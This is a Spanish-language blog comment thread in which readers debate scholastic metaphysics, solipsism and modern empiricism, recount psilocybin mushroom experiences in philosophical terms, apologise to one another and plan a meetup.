          1) la idea de que “todas las potencias lo son de algún modo”, (…) no pareciera ser el dato más fundamental cuando aprehendemos cualquier cosa;

          Como digo, al menos en términos genéticos, sí que es fundamental.

          2) que con la setas (…) quizás las setas no descubran una suerte de “conocimiento perenne”

          Si las setas alteran el estado de la consciencia y corren la linde entre consciente e inconsciente y los arquetipos junguianos son los morfemas del conocimiento perenne, entonces, yo creo que las setas sí dan acceso a ese empíreo de símbolos.

          3) (…) la interpretación que yo le he dado a la experiencia con setas (…) no la comparto estando mis facultades en estado “normal”;

          La sobriedad es distinta de la ebriedad, perogrullo.

          4) contra Aristóteles y Tomás de Aquino afirmo que explicar las cosas en términos de potencias y actos es cuanto menos problemático por toda la crítica que ha arrancado desde la modernidad (a partir de los nominalistas, por ej: cuando Hume dice que sólo percibimos accidentes, luego no hay sub-stancias ni sujetos; o Berkeley cuando anuncia su esse es percipi, luego para Berkeley, las potencias no pueden ser, como tampoco podrían darse algunos accidentes, como la cualidad accidental de la tridimensionalidad en el acto de ver puesto que, de suyo, vemos en dos dimensiones, etc.).

          Estos filósofos que estás mentando son los que abandonan la filosofía de la moral y se convierten en puros y meros economistas. Por supuesto, en ese paradigma, es un clásico: la realidad no es lo que es sino lo que los inversores y accionistas perciben de ella. Y, trepando, trepando, tras los neoliberales (Smith, Friedmann), llegan Soros & cía.

          Resumiendo, Jasso, ¿tú que opinas, eres más de teoría del equilibrio o teoría de la reflexividad?

          ¿Con cuál de los dos bloques estarías más de acuerdo, con el azul o con el verde?
          😀

          Me gusta

        2.  

          Entonces, quizás, según entiendo, en tu argumento, me sugiere, habría un problema de solipsismo.

          Ya que en lugar de considerar que el verde de una hoja tiene lugar por causa de la cantidad de clorofilaque contiene el ser vegetal estamos interpretando tal cuestión según la percepción del observador y su capacidad óptica.

          En la aprehensión primordial que tenemos de las cosas no hay “percepción del observador” y capacidad óptica. Eso son explicaciones ulteriores que dependen de la aprensión simple del verde del árbol para poderse dar. En el caso del solipsismo, está el presupuesto de una sustancia pensante (res cogitans), que no sabe muy bien si puede tener algún acceso fuera de su propia sustancia y que podría llegar a declarar el mundo externo como “irreal”. Si aceptásemos ese presupuesto, es decir, de aceptar el pre-juicio de una sub-stancia (algo que subyace) que sostiene nuestras representaciones mentales aunque tal cosa como sustancia no la aprehendamos como tal, sino sustantividades que se dan en un sistema de notas, como tampoco aprehendemos primordialmente las realidades como representaciones ni como algo siendo sostenido por un sustrato (un sub-iecto), entonces tendríamos que explicar nuestra duda sobre las cosas extra mentem concluyendo que tal vez son irreales o inexistentes, pero puesto que esto lo conocemos a partir de las realidades aprehendidas primordialmente, citeriores a la res cogitans y a una demarcación entre sujeto y objeto,  habrá que añadir que tal irrealidad es realmente irreal y que tal explicación no termina de agotar nuestra descripción de las realidades aprehendidas primordialmente, que siempre tienen un prius, un más que nunca se agota.

          En cualquier caso el solipsismo sólo funciona cuando se aceptan sus presupuestos. Cuando no, queda descartado, nunca mejor dicho, como también le ocurre al idealismo y al empirismo.

          P.S.: diría que me inclino más por la teoría de la reflexividad, aunque no sé si la llamaría así.

          Me gusta

  2. Lo que si creo, es que una vez que conoces el TAO con 1 gr de Cyanescens Hawaian, nunca vuelves a ser el mismo al 100%, esa actualizacion, esa potencia, modifica tu cerebro por siempre, es como si rompiese el precinto a una parte determinada del cerebro, tienes la capacidad para aceptar el todo, aunque es un laberinto aceptar el todo en su plenitud, es la madriguera de conejos de Morfeo,,, Rabbits…Rabbins Casualmente despues de mis varias experiencias con las setas, en mi caso me empece a dar cuenta de la programacion linguistica, y ves cosa mas alla, como una desprogramacion.

    Siento mi sermon de la montaña

    Me gusta

  3. En lugar de borrar la frase de mi primer comentario en este hilo, prefiero quedar por tonto al haber hecho la desafortunada comparación de equiparar a Jasso con un tonto. De hecho, las más de las veces disfruto mucho con tus meditados comentarios, a pesar de que no sea capaz de seguirte en un 70% de lo que dices o al menos en la forma en que te expresas. Pero eso no es culpa tuya, es culpa mía. En todo caso, mi comentario iba en la dirección de animarte(nos) a conseguir un diálogo fluido para la mayoría de los contertulios.

    En fin, que he metido la pata.

    Lo siento Jasso, me he equivocado y te pido disculpas.

    Me gusta

    1. Yo también te pido perdón por no haber captado el lenguaje coloquial de la entrada y por usar —diría que no de manera intencional— un estilo confuso.

      Lo único que quise transmitir es que 1) la idea de que “todas las potencias lo son de algún modo”, es interesante, y varios escolásticos han tratado el tema, opino que por algo será que lo han hecho, pero que es problemática porque no pareciera ser el dato más fundamental cuando aprehendemos cualquier cosa; 2) que con la setas no he llegado a una conclusión como la que nos compartes, ergo, ello muestra que quizás las setas no descubran una suerte de “conocimiento perenne” sino uno mediado por nuestras circunstancias históricas y biográficas (o tal vez no); 3) puesto que el mundo de Leibniz es un mundo necesario, yo no comparto su postura. Eso no significa que no admire a Leibniz, y significa también que la interpretación que yo le he dado a la experiencia con setas —que NO tiene que ser la última y definitiva: de hecho, tras la experiencia me empeciné en creer que había dado con una realidad impersonal, cuando de hecho era una realidad de naturaleza personal, dialógica, amorosa y abismal que se comunicaba intuitivamente con mi corazón— no la comparto estando mis facultades en estado “normal”; y 4) contra Aristóteles y Tomás de Aquino afirmo que explicar las cosas en términos de potencias y actos es cuanto menos problemático por toda la crítica que ha arrancado desde la modernidad (a partir de los nominalistas, por ej: cuando Hume dice que sólo percibimos accidentes, luego no hay sub-stancias ni sujetos; o Berkeley cuando anuncia su esse es percipi, luego para Berkeley, las potencias no pueden ser, como tampoco podrían darse algunos accidentes, como la cualidad accidental de la tridimensionalidad en el acto de ver puesto que, de suyo, vemos en dos dimensiones, etc.).

      Repito que me disculpo si he resultado pedante o por si he tenido alguna actitud ofensiva con mi comentario que, insisto, no era para nada la intención.

      Un abrazo, Nosce.

      Me gusta

  4. a pesar de que no sea capaz de seguirte en un 70% de lo que dices o al menos en la forma en que te expresas.

    En mi caso, lo que Jasso aquí dice y la forma en la que expresa me permite seguirle a un 99,9%. De hecho, si se me permite, diría, incluso, que hace un uso del lenguaje perfectamente correcto. De modo tal que las posturas sostenidas pueden derivarse y perfeccionarse ateniéndose a la formulación formal de los arquetipos e ideas fuerzas que mantiene con todo rigor sintático. Por tanto, puedo seguir con facilidad sus argumentaciones y comprender qué giros y requiebros plantea con sus letras. Por supuesto, la era de la información ha traído estas posibilidades de leernos cuánticamente y forjar un entrelazamiento de psiques…

    Nosce, ¿hacemos una cenita procon? ¿la hacemos en Madrid? ¿Vamos al valle de los caídos y hacemos allí una cenita? Me refiero en flan quedada procon de la comunidad.

    Por otra parte, todo lo que no sea sostener el instrumento y darse a la vida en la ceremonia del escenario es puro y mero ensayo. Todos ensayamos, pero los escenarios son pocos y están forjados en tiempo y taquilla.

    Brothers and sisters, make love not war!

    P.D.: Este finde paro de escribir que se me sube la hiperia y me pongo todo perdido de entropía. Happy week! See you next friday!

    Me gusta

  5. Te voy a contar Gallardo una tontuna graciosa lo más breve posible. Hace unos meses te leí por aquí que a lo mejor ibas al Eleusino del que hablé con Nosce porque querías hacerle una pregunta al doctor Gaona. O eso interpreté porque como dice Wilber, los exteriores pueden ser vistos pero los interiores deben ser interpretados y tanto en tu caso como en el de Jasso (al que por fin con gran placer he entendido un texto de cabo a rabo) mese complica la cosa. El caso es que me pasé el Eleusino pensando cuál de todos podrías ser tú y no sé por qué, o bueno sí, me fui a fijar en un chaval que ya la primera pregunta que hizo el primer día fue un rediós de nigromancia. Al día siguiente me senté a su lado en la charla que dio el monje budista y tío, cuando llega el coloquio veo que su colega le engancha con la mano el muslo apretando como un torniquete mientras el pibe lanza su pregunta. La pregunta comenzó algo así como “con todos mis respetos”, más suave que un guante de visón en cada intervención, y la nigromancia en cuestión era sobre el budismo jandenauer y el hinduísmo apeticán, quizá demor, no recuerdo bien, a propósito de revelar la presencia en meditación. Tuvieron una charlita/discusión bastante amena y llenita de conjuros pero cada vez que abría el muchacho el pico allá que iba su colega a cortarle la circulación en la pierna. Al acabar la charla les pregunté entre sonrisas el porqué de las apreturas y el colega me dijo que le ayudaba a controlarse, que era mejor así. Así que macho, me vas a perdonar pero el último día, haciendo acopio de todo mi valor tras uno enorme de amnesia,, le pregunté si escribía en internet como Gallardonegro, y sinceramente lo hice porque de todos los que estaban allí era el único que me pareció lo suficientemente raro como para escribir en esa lengua tuya que parece salida del manuscrito Voynich. El muchacho me dijo que no escribía nada en ninguna parte y ahí se quedó la cosa.

    Así que por supuesto que me apunto a esa quedada cuando los asuntos propios del cerebro de Josete tengan a bien, nos vamos a echar unas risas. Por cierto cómo coño tienes el backup del foro, alguna vez he intentao rebuscar ahí cosas que se dijeron pero dejó de funcionar hace mucho que yo sepa. Te acuerdas de Julio el cubanito cuentacuentos, sacó un libro con sus intervenciones que llamó “Un cubanito en la web de Sánchez Dragó”, una infumable serie de polladas sin pies ni cabeza enlazadas unas con otras, así que no sé yo si quisiera ver nuestras vergùenzas de juventud en negro sobre blanco 😂

    Me gusta

    1. La pregunta comenzó algo así como “con todos mis respetos”, más suave que un guante de visón en cada intervención, y la nigromancia en cuestión era sobre el budismo jandenauer y el hinduísmo apeticán, quizá demor, no recuerdo bien,

      te PROHÍBO que vuelvas a hacer eso en este bloj

      merendando…puto teclao to pringao ya…!

      Me gusta

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión /  Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión /  Cambiar )

Conectando a %s